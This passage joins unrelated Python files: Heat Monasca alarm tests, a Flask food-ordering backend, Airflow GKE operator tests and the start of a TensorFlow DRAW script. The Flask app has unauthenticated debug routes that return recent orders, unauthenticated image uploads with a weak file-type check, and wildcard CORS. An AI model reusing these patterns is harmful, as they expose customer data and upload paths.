db_api.event_create(_get_fake_event_values(id='2', time=time2))
db_api.event_create(_get_fake_event_values(id='3', time=time3))
check_query('2030-01-01 02:00', 'lt', ['1'])
check_query('2030-01-01 02:00', 'le', ['2', '1'])
check_query('2030-01-01 02:00', 'gt', ['3'])
check_query('2030-01-01 02:00', 'ge', ['3', '2'])
check_query('2030-01-01 02:00', 'eq', ['2'])
|
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from heat.engine.clients.os import monasca as client_plugin
from heat.engine import resource
from heat.engine.resources.openstack.monasca import alarm_definition
from heat.engine import stack
from heat.engine import template
from heat.tests import common
from heat.tests import utils
sample_template = {
'heat_template_version': '2015-10-15',
'resources': {
'test_resource': {
'type': 'OS::Monasca::AlarmDefinition',
'properties': {
'name': 'sample_alarm_id',
'description': 'sample alarm def',
'expression': 'sample expression',
'match_by': ['match_by'],
'severity': 'low',
'ok_actions': ['sample_notification'],
'alarm_actions': ['sample_notification'],
'undetermined_actions': ['sample_notification'],
'actions_enabled': False
}
}
}
}
RESOURCE_TYPE = 'OS::Monasca::AlarmDefinition'
class MonascaAlarmDefinition(alarm_definition.MonascaAlarmDefinition):
"""This class overrides the is_service_available to return True.
Monasca service is not available by default. So, this class overrides
the is_service_available to return True.
"""
@classmethod
def is_service_available(cls, context):
return True
class MonascaAlarmDefinitionTest(common.HeatTestCase):
def setUp(self):
super(MonascaAlarmDefinitionTest, self).setUp()
self.ctx = utils.dummy_context()
# As monascaclient is not part of requirements.txt, RESOURCE_TYPE is
# not registered by default. For testing, its registered here
resource._register_class(RESOURCE_TYPE,
MonascaAlarmDefinition)
self.stack = stack.Stack(
self.ctx, 'test_stack',
template.Template(sample_template)
)
self.test_resource = self.stack['test_resource']
# Mock client
self.test_client = mock.MagicMock()
self.test_resource.client = mock.MagicMock(
return_value=self.test_client)
# Mock client plugin
self.test_client_plugin = client_plugin.MonascaClientPlugin(self.ctx)
self.test_client_plugin._create = mock.MagicMock(
return_value=self.test_client)
self.test_resource.client_plugin = mock.MagicMock(
return_value=self.test_client_plugin)
self.test_client_plugin.get_notification = mock.MagicMock(
return_value='sample_notification')
def _get_mock_resource(self):
value = dict(id='477e8273-60a7-4c41-b683-fdb0bc7cd152')
return value
def test_resource_handle_create(self):
mock_alarm_create = self.test_client.alarm_definitions.create
mock_alarm_patch = self.test_client.alarm_definitions.patch
mock_resource = self._get_mock_resource()
mock_alarm_create.return_value = mock_resource
# validate the properties
self.assertEqual(
'sample_alarm_id',
self.test_resource.properties.get(
alarm_definition.MonascaAlarmDefinition.NAME))
self.assertEqual(
'sample alarm def',
self.test_resource.properties.get(
alarm_definition.MonascaAlarmDefinition.DESCRIPTION))
self.assertEqual(
'sample expression',
self.test_resource.properties.get(
alarm_definition.MonascaAlarmDefinition.EXPRESSION))
self.assertEqual(
['match_by'],
self.test_resource.properties.get(
alarm_definition.MonascaAlarmDefinition.MATCH_BY))
self.assertEqual(
'low',
self.test_resource.properties.get(
alarm_definition.MonascaAlarmDefinition.SEVERITY))
self.assertEqual(
['sample_notification'],
self.test_resource.properties.get(
alarm_definition.MonascaAlarmDefinition.OK_ACTIONS))
self.assertEqual(
['sample_notification'],
self.test_resource.properties.get(
alarm_definition.MonascaAlarmDefinition.ALARM_ACTIONS))
self.assertEqual(
['sample_notification'],
self.test_resource.properties.get(
alarm_definition.MonascaAlarmDefinition.UNDETERMINED_ACTIONS))
self.assertEqual(
False,
self.test_resource.properties.get(
alarm_definition.MonascaAlarmDefinition.ACTIONS_ENABLED))
self.test_resource.data_set = mock.Mock()
self.test_resource.handle_create()
# validate physical resource id
self.assertEqual(mock_resource['id'], self.test_resource.resource_id)
args = dict(
name='sample_alarm_id',
description='sample alarm def',
expression='sample expression',
match_by=['match_by'],
severity='low',
ok_actions=['sample_notification'],
alarm_actions=['sample_notification'],
undetermined_actions=['sample_notification']
)
mock_alarm_create.assert_called_once_with(**args)
mock_alarm_patch.assert_called_once_with(
alarm_id=self.test_resource.resource_id,
actions_enabled=False)
def test_resource_handle_update(self):
mock_alarm_patch = self.test_client.alarm_definitions.patch
self.test_resource.resource_id = '477e8273-60a7-4c41-b683-fdb0bc7cd151'
prop_diff = {
alarm_definition.MonascaAlarmDefinition.NAME:
'name-updated',
alarm_definition.MonascaAlarmDefinition.DESCRIPTION:
'description-updated',
alarm_definition.MonascaAlarmDefinition.ACTIONS_ENABLED:
True,
alarm_definition.MonascaAlarmDefinition.SEVERITY:
'medium',
alarm_definition.MonascaAlarmDefinition.OK_ACTIONS:
['sample_notification'],
alarm_definition.MonascaAlarmDefinition.ALARM_ACTIONS:
['sample_notification'],
alarm_definition.MonascaAlarmDefinition.UNDETERMINED_ACTIONS:
['sample_notification']}
self.test_resource.handle_update(json_snippet=None,
tmpl_diff=None,
prop_diff=prop_diff)
args = dict(
alarm_id=self.test_resource.resource_id,
name='name-updated',
description='description-updated',
actions_enabled=True,
severity='medium',
ok_actions=['sample_notification'],
alarm_actions=['sample_notification'],
undetermined_actions=['sample_notification']
)
mock_alarm_patch.assert_called_once_with(**args)
def test_resource_handle_delete(self):
mock_alarm_delete = self.test_client.alarm_definitions.delete
self.test_resource.resource_id = '477e8273-60a7-4c41-b683-fdb0bc7cd151'
mock_alarm_delete.return_value = None
self.assertIsNone(self.test_resource.handle_delete())
mock_alarm_delete.assert_called_once_with(
alarm_id=self.test_resource.resource_id
)
def test_resource_handle_delete_resource_id_is_none(self):
self.test_resource.resource_id = None
self.assertIsNone(self.test_resource.handle_delete())
def test_resource_handle_delete_not_found(self):
# TODO(skraynev): remove it when monasca client will be
# merged in global requirements
class NotFound(Exception):
pass
client_plugin.monasca_exc = mock.Mock()
client_plugin.monasca_exc.NotFound = NotFound
self.test_resource.resource_id = '477e8273-60a7-4c41-b683-fdb0bc7cd151'
mock_alarm_delete = self.test_client.alarm_definitions.delete
mock_alarm_delete.side_effect = client_plugin.monasca_exc.NotFound
self.assertIsNone(self.test_resource.handle_delete())
def test_resource_show_resource(self):
mock_notification_get = self.test_client.alarm_definitions.get
mock_notification_get.return_value = {}
self.assertEqual({},
self.test_resource._show_resource(),
'Failed to show resource')
|
|
import os
import sys
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__))))
from urllib.parse import unquote
from uuid import uuid4
from flask import Flask, session, render_template, send_file, make_response, request, redirect, g, current_app
from flask_login import login_required, UserMixin, login_user, logout_user, current_user
from flask_mail import Mail
from flask_pymongo import PyMongo
from flask_restful import Api
from flask_babel import Babel
from werkzeug.utils import secure_filename
from service.ProductService import ProductService
from service.StoreService import StoreService
from service.TenantService import TenantService
from service.UserService import UserService
from libs.flask_googlelogin import GoogleLogin
from flask_principal import Principal, Permission, Identity, AnonymousIdentity
from flask_principal import identity_loaded, identity_changed, RoleNeed, UserNeed
from flask_cors import CORS
from bson import ObjectId, json_util
import json
import pdfkit
from oauth2client import client, crypt
from flogging import logging, setup_logging
setup_logging()
logger = logging.getLogger(__name__)
logger.info("Starting flask app...")
app = Flask(__name__, instance_relative_config=False)
app.config.from_pyfile('foodbeazt.cfg', silent=True)
if os.environ.get('FOODBEAZT_CONFIG', None) is not None:
logger.info("Loading config from %(logfile)s", {'logfile': os.environ.get('FOODBEAZT_CONFIG')})
app.config.from_envvar('FOODBEAZT_CONFIG')
# CORS
cors = CORS(app, resources={r"/api/*": {"origins": "*"}}) # , send_wildcard=True)
# Mongodb
mongo = PyMongo()
# monog.init_app(app)
api = Api(app)
# MAIL
mail = Mail(app)
# Setup Google Federated Auth
auth = GoogleLogin(app)
# load the extension
principals = Principal(app)
# Create a permission with a single Need, in this case a RoleNeed.
admin_permission = Permission(RoleNeed('tenant_admin'))
store_admin_permission = Permission(RoleNeed('store_admin'))
# localization
babel = Babel(app)
@app.before_first_request
def init_mongo_db():
logger.info("Initializing mongodb")
mongo.init_app(app)
@babel.localeselector
def get_locale():
return g.get('current_lang', 'en')
@app.route('/oauth2callback')
@auth.oauth2callback
def outhCallback(token, userinfo, **params):
create_or_update_user(userinfo)
return redirect('/admin')
@identity_loaded.connect_via(app)
def on_identity_loaded(sender, identity):
# Set the identity user object
identity.user = current_user
# Add the UserNeed to the identity
if hasattr(current_user, 'id'):
identity.provides.add(UserNeed(current_user.id))
# Assuming the User model has a list of roles, update the
# identity with the roles that the user provides
if hasattr(current_user, 'roles'):
for role in current_user.roles:
identity.provides.add(RoleNeed(role))
def create_or_update_user(user_info):
user = get_or_create_user(user_info)
user_mixin = getUserMixin(user)
if user_mixin.name != "Guest":
login_user(user_mixin)
# Tell Flask-Principal the identity changed
identity_changed.send(current_app._get_current_object(), identity=Identity(str(user_mixin.id)))
return user_mixin
def login_anonymous():
return create_or_update_user({
'id': 'guest@foodbeazt.in',
'name': 'Guest',
'email': 'guest@foodbeazt.in',
'roles': ['member']
})
def getUserMixin(user):
if user is None:
return None
tenant_id = request.cookies.get('tenant_id', None)
if not tenant_id:
tenant_id = user.get('tenant_id', None)
else:
tenant_id = unquote(tenant_id).replace('"', '')
return User(user['_id'], tenant_id, user['name'], user['email'], user['roles'],
user.get('tenant_id', None), user.get('identity', None))
def default_tenantId():
return TenantService(mongo.db).get_by_name("FoodBeazt")['_id']
def get_or_create_user(item):
service = UserService(mongo.db)
email = item['email']
prev = service.get_by_email(email)
if prev:
return prev
logger.info("Creating new user...[%s]" % email)
tenant_id = default_tenantId()
if email == app.config['SUPER_ADMIN_EMAIL']:
roles = ["tenant_admin", 'member']
else:
roles = ["member"]
user = {
'username': email,
'email': email,
'name': item['name'],
'auth_type': 'google',
'tenant_id': tenant_id,
'roles': roles,
'identity': item.get('id', item.get('sub', None))
}
service.create(user)
return user
@auth.user_loader
def get_user(userid):
if request and request.path.startswith('/static/'):
return None
user = UserService(mongo.db).get_by_id(userid)
return getUserMixin(user)
def login_via_google_token(token):
if token == 'null':
return None
try:
idinfo = client.verify_id_token(token, auth.client_id)
if idinfo['aud'] not in [auth.client_id]:
raise crypt.AppIdentityError("Unrecognized client.")
if idinfo['iss'] not in ['accounts.google.com', 'https://accounts.google.com']:
raise crypt.AppIdentityError("Wrong issuer.")
if 'hd' in idinfo and idinfo['hd'] not in ['foodbeazt.in', 'localhost']:
raise crypt.AppIdentityError("Wrong hosted domain.")
return getUserMixin(get_or_create_user(idinfo))
except crypt.AppIdentityError as e:
logger.exception(e)
return None
@auth.request_loader
def request_loader(request):
if request and request.path.startswith('/static/'):
return None
user_mixin = None
userService = UserService(mongo.db)
authHeader = request.headers.get('Authorization', None)
if authHeader and len(authHeader) > 0:
if authHeader.startswith('Bearer '):
user_mixin = login_via_google_token(authHeader.replace('Bearer ', ''))
if user_mixin is None and session and session.get('identity.id', None) is not None:
logger.info("[%s] Using session stored user. Id: %s" % (request.path, session['identity.id']))
userid = str(session['identity.id'])
user_mixin = getUserMixin(userService.get_by_id(userid))
if user_mixin:
login_user(user_mixin)
identity_changed.send(current_app._get_current_object(), identity=Identity(str(user_mixin.id)))
logger.info("[%s] User login success: %s %s" % (request.path, user_mixin.id, user_mixin.name))
return user_mixin
# logger.info("Anonymous login initiated############### %s" % (request.path))
return login_anonymous()
class User(UserMixin):
def __init__(self, user_id=None, tenant_id=None, name=None, email=None,
roles=[], user_tenant_id=None,
identity=None):
self.id = user_id
self.user_id = user_id
self.tenant_id = tenant_id
self.name = name
self.email = email
self.roles = roles
self.user_tenant_id = user_tenant_id
self.identity = identity
def is_authenticated(self):
return not self.is_anonymous()
def is_anonymous(self):
return self.email in [None, "-1", "", 'guest@foodbeazt.in']
@app.before_request
def set_user_on_request_g():
setattr(g, 'user', current_user)
@api.representation('application/json')
def mjson(data, code, headers=None):
d = json.dumps(data, default=json_util.default)
resp = make_response(d, code)
resp.headers.extend(headers or {})
return resp
@app.route("/")
def home():
return redirect('/admin')
@app.route("/login")
def login():
return current_app.login_manager.unauthorized()
@app.route("/test_order_email")
def test_order_email():
tenant_id = g.user.tenant_id
query = {'tenant_id': ObjectId(tenant_id)}
order = [x for x in mongo.db.order_collection.find(query).sort("created_at", -1)][0]
return render_template("email/order_created.html", order=order)
@app.route("/test_order_delivered")
def test_order_delivered():
tenant_id = g.user.tenant_id
query = {'tenant_id': ObjectId(tenant_id), 'status': 'DELIVERED'}
order = [x for x in mongo.db.order_collection.find(query).sort("created_at", -1)][0]
return render_template("email/order_delivered.html", order=order)
@app.route("/admin")
def admin_home():
if not current_user.is_authenticated():
return current_app.login_manager.unauthorized()
if not admin_permission.can():
doLogout()
return "You are unauthorized to access this page! Sorry :(", 403
return render_template('admin/index.jinja2')
@app.route('/logout')
@app.route('/logout/')
def app_logout():
doLogout()
return redirect('/logout_success')
@app.route('/logout_success')
def logout_success():
return render_template('admin/logout.jinja2')
def doLogout():
logout_user()
# Tell Flask-Principal the user is anonymous
identity_changed.send(current_app._get_current_object(), identity=AnonymousIdentity())
session.clear()
APP_ROOT = os.path.dirname(os.path.abspath(__file__))
export_data_folder = os.path.join(APP_ROOT, 'uploads', 'export')
import_data_folder = os.path.join(APP_ROOT, 'uploads', 'import')
product_upload_folder = os.path.join(APP_ROOT, 'static/images/products/')
store_upload_folder = os.path.join(APP_ROOT, 'static/images/stores/')
invoice_emails_folder = os.path.join(APP_ROOT, 'invoice_emails')
@app.route("/test_order_invoice")
def test_order_invoice():
logger.info("test order invoice")
tenant_id = g.user.tenant_id
try:
query = {'tenant_id': ObjectId(tenant_id), 'status': 'DELIVERED'}
order = [x for x in mongo.db.order_collection.find(query).sort("created_at", -1)][0]
config = pdfkit.configuration(wkhtmltopdf='/usr/local/bin/wkhtmltopdf'.encode('utf-8'))
html_text = render_template("email/order_invoice.html", order=order)
output_filename = os.path.join(invoice_emails_folder, "Invoice-%s.pdf" % (order['order_no']))
pdfkit.from_string(html_text, output_filename, configuration=config)
return send_file(output_filename, mimetype='application/pdf')
except Exception as e:
logger.exception(e)
return "Error in generating PDF invoice"
def allowed_files(filename):
print(filename)
return '.' in filename and filename.split('.')[1] in ['jpg', 'png', 'gif', 'jpeg', 'bmp']
@app.route("/api/upload_product_image/<string:_id>", methods=['GET', 'POST'])
def upload_product_image(_id):
service = ProductService(mongo.db)
item = service.get_by_id(_id)
if item and request.files and len(request.files) > 0 and request.files['file']:
if 'image_url' in item and item['image_url']:
fname = os.path.join(product_upload_folder, item['image_url'])
if os.path.isfile(fname):
os.remove(fname)
file_body = request.files['file']
if allowed_files(secure_filename(file_body.filename)):
filename = secure_filename(str(uuid4()) + "." + file_body.filename.split('.')[1])
item['image_url'] = filename
file_body.save(os.path.join(product_upload_folder, filename))
service.update(item)
return json.dumps({"status": "success", "id": _id, "filename": filename})
else:
print("file type not allowed")
return '', 404
@app.route("/api/upload_store_image/<string:_id>", methods=['GET', 'POST'])
def upload_store_image(_id):
service = StoreService(mongo.db)
item = service.get_by_id(_id)
if item and request.files and len(request.files) > 0 and request.files['file']:
if 'image_url' in item and item['image_url']:
fname = os.path.join(store_upload_folder, item['image_url'])
if os.path.isfile(fname):
os.remove(fname)
file_body = request.files['file']
if allowed_files(secure_filename(file_body.filename)):
filename = secure_filename(str(uuid4()) + "." + file_body.filename.split('.')[1])
item['image_url'] = filename
file_body.save(os.path.join(store_upload_folder, filename))
service.save(item)
return json.dumps({"status": "success", "id": _id, "filename": filename})
return '', 404
@app.template_filter('datetime')
def _jinja2_filter_datetime(value, fmt=None):
if value is None:
return ''
if fmt is None or len(fmt) == 0:
fmt = '%b %d, %Y %H:%m'
return value.strftime(fmt)
from foodbeazt.resources.subscription import SubscriptionApi, SubscriptionListApi
from foodbeazt.resources.tenant import TenantListApi, TenantApi
from foodbeazt.resources.user import UserApi, UserListApi
from foodbeazt.resources.store import StoreApi, StoreListApi, StoreCuisineApi
from foodbeazt.resources.store_review import StoreReviewApi
from foodbeazt.resources.product import ProductApi, ProductListApi, ProductActivateApi
from foodbeazt.resources.order import OrderApi, TrackOrderApi
from foodbeazt.resources.coupon import ValidateCouponApi
from foodbeazt.resources.order_list import OrderListApi
from foodbeazt.resources.store_order_list import StoreOrderListApi
from foodbeazt.resources.order_status import OrderStatusApi
from foodbeazt.resources.export_data import ExportDataApi
from foodbeazt.resources.popular_items import PopularItemsApi
from foodbeazt.resources.popular_stores import PopularStoresApi
from foodbeazt.resources.sms import SmsApi
from foodbeazt.resources.report import ReportApi, PaymentReportApi
from foodbeazt.resources.pincodes import PincodeListApi, PincodeApi
from foodbeazt.resources.myorders import MyOrdersApi
from foodbeazt.resources.push_notify import RegisterPushNotify, UnRegisterPushNotify
from foodbeazt.resources.store_order_status import StoreOrderStatusApi
from foodbeazt.resources.store_order_report import StoreOrderReportApi
from foodbeazt.resources.user_stores import UserStores
from foodbeazt.resources.settings import SettingsApi
@app.route('/test_new_order_notify')
def test_new_order_notify():
tenant_id = g.user.tenant_id
query = {'tenant_id': ObjectId(tenant_id)}
order = [x for x in mongo.db.order_collection.find(query).sort("created_at", -1)][0]
try:
api = OrderApi()
api.notify_new_order(order)
return json_util.dumps({'status': 'success', 'order': order})
except Exception as e:
logger.exception(e)
return json_util.dumps({'status': 'error', 'message': "Error in generating PDF invoice"})
api.add_resource(MyOrdersApi, '/api/my_orders')
api.add_resource(ReportApi, '/api/reports/orders')
api.add_resource(PaymentReportApi, '/api/reports/payment')
api.add_resource(SmsApi, '/api/sms')
api.add_resource(PincodeListApi, '/api/pincodes')
api.add_resource(PincodeApi, '/api/pincode/<string:_id>')
api.add_resource(PopularItemsApi, '/api/popular_items/<string:_id>')
api.add_resource(PopularStoresApi, '/api/popular_stores/<string:_id>')
api.add_resource(ExportDataApi, '/api/data_manage')
api.add_resource(SubscriptionApi, '/api/subscribe/<string:email>')
api.add_resource(SubscriptionListApi, '/api/subscriptions')
api.add_resource(TenantApi, '/api/tenant/<string:_id>')
api.add_resource(TenantListApi, '/api/tenants')
api.add_resource(UserApi, '/api/user/<string:_id>')
api.add_resource(UserListApi, '/api/users')
api.add_resource(StoreApi, '/api/store/<string:_id>')
api.add_resource(StoreReviewApi, '/api/store/<string:store_id>/review')
api.add_resource(StoreListApi, '/api/stores')
api.add_resource(StoreCuisineApi, '/api/stores/cuisines')
api.add_resource(ProductApi, '/api/product/<string:store_id>/<string:_id>')
api.add_resource(ProductActivateApi, '/api/product/activate/<string:store_id>/<string:_id>')
api.add_resource(ProductListApi, '/api/products/<string:store_id>')
api.add_resource(OrderApi, '/api/order/<string:_id>')
api.add_resource(OrderListApi, '/api/orders/')
api.add_resource(StoreOrderListApi, '/api/store_orders/<string:store_id>')
api.add_resource(TrackOrderApi, '/api/track/<string:order_no>')
api.add_resource(OrderStatusApi, '/api/order_status/<string:_id>')
api.add_resource(StoreOrderStatusApi, '/api/store_order_status')
api.add_resource(StoreOrderReportApi, '/api/store_order_reports/<string:store_id>')
api.add_resource(UserStores, '/api/user_stores')
api.add_resource(RegisterPushNotify, '/api/push_service/register')
api.add_resource(UnRegisterPushNotify, '/api/push_service/unregister')
api.add_resource(ValidateCouponApi, '/api/validate/coupon')
api.add_resource(SettingsApi, '/api/settings')
from views.payment import PaymentListApi, PaymentRedirectView, PaymentSuccessView, PaymentWebHookView
api.add_resource(PaymentListApi, '/api/payments')
app.add_url_rule('/api/payment/order', view_func=PaymentRedirectView.as_view('payment_redirect'))
app.add_url_rule('/api/payment/success', view_func=PaymentSuccessView.as_view('payment_success'))
app.add_url_rule('/api/payment/failure', view_func=PaymentSuccessView.as_view('payment_failure'))
app.add_url_rule('/api/payment/hook', view_func=PaymentWebHookView.as_view('payment_webhook'))
logger.info("APPLICATION LOADED SUCCESSFULLY!!")
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
import os
import unittest
import mock
from google.auth.environment_vars import CREDENTIALS
from mock import PropertyMock
from parameterized import parameterized
from airflow import AirflowException
from airflow.models import Connection
from airflow.providers.cncf.kubernetes.operators.kubernetes_pod import KubernetesPodOperator
from airflow.providers.google.cloud.operators.kubernetes_engine import (
GKECreateClusterOperator, GKEDeleteClusterOperator, GKEStartPodOperator,
)
TEST_GCP_PROJECT_ID = 'test-id'
PROJECT_LOCATION = 'test-location'
PROJECT_TASK_ID = 'test-task-id'
CLUSTER_NAME = 'test-cluster-name'
PROJECT_BODY = {'name': 'test-name'}
PROJECT_BODY_CREATE_DICT = {'name': 'test-name', 'initial_node_count': 1}
PROJECT_BODY_CREATE_CLUSTER = type(
"Cluster", (object,), {"name": "test-name", "initial_node_count": 1}
)()
TASK_NAME = 'test-task-name'
NAMESPACE = ('default',)
IMAGE = 'bash'
GCLOUD_COMMAND = "gcloud container clusters get-credentials {} --zone {} --project {}"
KUBE_ENV_VAR = 'KUBECONFIG'
FILE_NAME = '/tmp/mock_name'
class TestGoogleCloudPlatformContainerOperator(unittest.TestCase):
@parameterized.expand(
(body,) for body in [PROJECT_BODY_CREATE_DICT, PROJECT_BODY_CREATE_CLUSTER]
)
@mock.patch('airflow.providers.google.cloud.operators.kubernetes_engine.GKEHook')
def test_create_execute(self, body, mock_hook):
operator = GKECreateClusterOperator(project_id=TEST_GCP_PROJECT_ID,
location=PROJECT_LOCATION,
body=body,
task_id=PROJECT_TASK_ID)
operator.execute(None)
mock_hook.return_value.create_cluster.assert_called_once_with(
cluster=body, project_id=TEST_GCP_PROJECT_ID)
@parameterized.expand(
(body,) for body in [
None,
{'missing_name': 'test-name', 'initial_node_count': 1},
{'name': 'test-name', 'missing_initial_node_count': 1},
type('Cluster', (object,), {'missing_name': 'test-name', 'initial_node_count': 1})(),
type('Cluster', (object,), {'name': 'test-name', 'missing_initial_node_count': 1})(),
]
)
@mock.patch('airflow.providers.google.cloud.operators.kubernetes_engine.GKEHook')
def test_create_execute_error_body(self, body, mock_hook):
with self.assertRaises(AirflowException):
GKECreateClusterOperator(project_id=TEST_GCP_PROJECT_ID,
location=PROJECT_LOCATION,
body=body,
task_id=PROJECT_TASK_ID)
# pylint: disable=no-value-for-parameter
@mock.patch('airflow.providers.google.cloud.operators.kubernetes_engine.GKEHook')
def test_create_execute_error_project_id(self, mock_hook):
with self.assertRaises(AirflowException):
GKECreateClusterOperator(location=PROJECT_LOCATION,
body=PROJECT_BODY,
task_id=PROJECT_TASK_ID)
# pylint: disable=no-value-for-parameter
@mock.patch('airflow.providers.google.cloud.operators.kubernetes_engine.GKEHook')
def test_create_execute_error_location(self, mock_hook):
with self.assertRaises(AirflowException):
GKECreateClusterOperator(project_id=TEST_GCP_PROJECT_ID,
body=PROJECT_BODY,
task_id=PROJECT_TASK_ID)
@mock.patch('airflow.providers.google.cloud.operators.kubernetes_engine.GKEHook')
def test_delete_execute(self, mock_hook):
operator = GKEDeleteClusterOperator(project_id=TEST_GCP_PROJECT_ID,
name=CLUSTER_NAME,
location=PROJECT_LOCATION,
task_id=PROJECT_TASK_ID)
operator.execute(None)
mock_hook.return_value.delete_cluster.assert_called_once_with(
name=CLUSTER_NAME, project_id=TEST_GCP_PROJECT_ID)
# pylint: disable=no-value-for-parameter
@mock.patch('airflow.providers.google.cloud.operators.kubernetes_engine.GKEHook')
def test_delete_execute_error_project_id(self, mock_hook):
with self.assertRaises(AirflowException):
GKEDeleteClusterOperator(location=PROJECT_LOCATION,
name=CLUSTER_NAME,
task_id=PROJECT_TASK_ID)
# pylint: disable=no-value-for-parameter
@mock.patch('airflow.providers.google.cloud.operators.kubernetes_engine.GKEHook')
def test_delete_execute_error_cluster_name(self, mock_hook):
with self.assertRaises(AirflowException):
GKEDeleteClusterOperator(project_id=TEST_GCP_PROJECT_ID,
location=PROJECT_LOCATION,
task_id=PROJECT_TASK_ID)
# pylint: disable=no-value-for-parameter
@mock.patch('airflow.providers.google.cloud.operators.kubernetes_engine.GKEHook')
def test_delete_execute_error_location(self, mock_hook):
with self.assertRaises(AirflowException):
GKEDeleteClusterOperator(project_id=TEST_GCP_PROJECT_ID,
name=CLUSTER_NAME,
task_id=PROJECT_TASK_ID)
class TestGKEPodOperator(unittest.TestCase):
def setUp(self):
self.gke_op = GKEStartPodOperator(project_id=TEST_GCP_PROJECT_ID,
location=PROJECT_LOCATION,
cluster_name=CLUSTER_NAME,
task_id=PROJECT_TASK_ID,
name=TASK_NAME,
namespace=NAMESPACE,
image=IMAGE)
def test_template_fields(self):
self.assertTrue(set(KubernetesPodOperator.template_fields).issubset(
GKEStartPodOperator.template_fields))
# pylint: disable=unused-argument
@mock.patch(
"airflow.hooks.base_hook.BaseHook.get_connections",
return_value=[Connection(
extra=json.dumps({})
)]
)
@mock.patch(
'airflow.providers.cncf.kubernetes.operators.kubernetes_pod.KubernetesPodOperator.execute')
@mock.patch('tempfile.NamedTemporaryFile')
@mock.patch("subprocess.check_call")
@mock.patch.dict(os.environ, {CREDENTIALS: '/tmp/local-creds'})
def test_execute_conn_id_none(self, proc_mock, file_mock, exec_mock, get_conn):
type(file_mock.return_value.__enter__.return_value).name = PropertyMock(side_effect=[
FILE_NAME
])
def assert_credentials(*args, **kwargs):
# since we passed in keyfile_path we should get a file
self.assertIn(CREDENTIALS, os.environ)
self.assertEqual(os.environ[CREDENTIALS], '/tmp/local-creds')
proc_mock.side_effect = assert_credentials
self.gke_op.execute(None)
# Assert Environment Variable is being set correctly
self.assertIn(KUBE_ENV_VAR, os.environ)
self.assertEqual(os.environ[KUBE_ENV_VAR], FILE_NAME)
# Assert the gcloud command being called correctly
proc_mock.assert_called_once_with(
GCLOUD_COMMAND.format(CLUSTER_NAME, PROJECT_LOCATION, TEST_GCP_PROJECT_ID).split())
self.assertEqual(self.gke_op.config_file, FILE_NAME)
# pylint: disable=unused-argument
@mock.patch(
"airflow.hooks.base_hook.BaseHook.get_connections",
return_value=[Connection(
extra=json.dumps({
'extra__google_cloud_platform__key_path': '/path/to/file'
})
)]
)
@mock.patch(
'airflow.providers.cncf.kubernetes.operators.kubernetes_pod.KubernetesPodOperator.execute')
@mock.patch('tempfile.NamedTemporaryFile')
@mock.patch("subprocess.check_call")
@mock.patch.dict(os.environ, {})
def test_execute_conn_id_path(self, proc_mock, file_mock, exec_mock, get_con_mock):
type(file_mock.return_value.__enter__.return_value).name = PropertyMock(side_effect=[
FILE_NAME
])
def assert_credentials(*args, **kwargs):
# since we passed in keyfile_path we should get a file
self.assertIn(CREDENTIALS, os.environ)
self.assertEqual(os.environ[CREDENTIALS], '/path/to/file')
proc_mock.side_effect = assert_credentials
self.gke_op.execute(None)
# Assert Environment Variable is being set correctly
self.assertIn(KUBE_ENV_VAR, os.environ)
self.assertEqual(os.environ[KUBE_ENV_VAR], FILE_NAME)
# Assert the gcloud command being called correctly
proc_mock.assert_called_once_with(
GCLOUD_COMMAND.format(CLUSTER_NAME, PROJECT_LOCATION, TEST_GCP_PROJECT_ID).split())
self.assertEqual(self.gke_op.config_file, FILE_NAME)
# pylint: disable=unused-argument
@mock.patch.dict(os.environ, {})
@mock.patch(
"airflow.hooks.base_hook.BaseHook.get_connections",
return_value=[Connection(
extra=json.dumps({
"extra__google_cloud_platform__keyfile_dict": '{"private_key": "r4nd0m_k3y"}'
})
)]
)
@mock.patch(
'airflow.providers.cncf.kubernetes.operators.kubernetes_pod.KubernetesPodOperator.execute')
@mock.patch('tempfile.NamedTemporaryFile')
@mock.patch("subprocess.check_call")
def test_execute_conn_id_dict(self, proc_mock, file_mock, exec_mock, get_con_mock):
type(file_mock.return_value.__enter__.return_value).name = PropertyMock(side_effect=[
FILE_NAME, '/path/to/new-file'
])
def assert_credentials(*args, **kwargs):
# since we passed in keyfile_dict we should get a new file
self.assertIn(CREDENTIALS, os.environ)
self.assertEqual(os.environ[CREDENTIALS], '/path/to/new-file')
proc_mock.side_effect = assert_credentials
self.gke_op.execute(None)
# Assert Environment Variable is being set correctly
self.assertIn(KUBE_ENV_VAR, os.environ)
self.assertEqual(os.environ[KUBE_ENV_VAR], FILE_NAME)
# Assert the gcloud command being called correctly
proc_mock.assert_called_once_with(
GCLOUD_COMMAND.format(CLUSTER_NAME, PROJECT_LOCATION, TEST_GCP_PROJECT_ID).split())
self.assertEqual(self.gke_op.config_file, FILE_NAME)
|
|
#!/usr/bin/env python
""""
Simple implementation of http://arxiv.org/pdf/1502.04623v2.pdf in TensorFlow
Example Usage:
python draw.py --data_dir=/tmp/draw --read_attn=True --write_attn=True
Author: Eric Jang
"""
import tensorflow as tf
from tensorflow.models.rnn.rnn_cell import LSTMCell
import input_data
import numpy as np
import os
import tsne
import numpy as Math
import pylab as Plot
from matplotlib.offsetbox import OffsetImage, AnnotationBbox
tf.flags.DEFINE_string("data_dir", "", "")
tf.flags.DEFINE_boolean("read_attn", True, "enable attention for reader")
tf.flags.DEFINE_boolean("write_attn",True, "enable attention for writer")
FLAGS = tf.flags.FLAGS
## MODEL PARAMETERS ##
data_directory = os.path.join(FLAGS.data_dir, "easy")
if not os.path.exists(data_directory):
os.makedirs(data_directory)
train_data = input_data.read_data_sets(data_directory, one_hot=True).train
A,B = 56,56 # image width,height
img_size = B*A # the canvas size
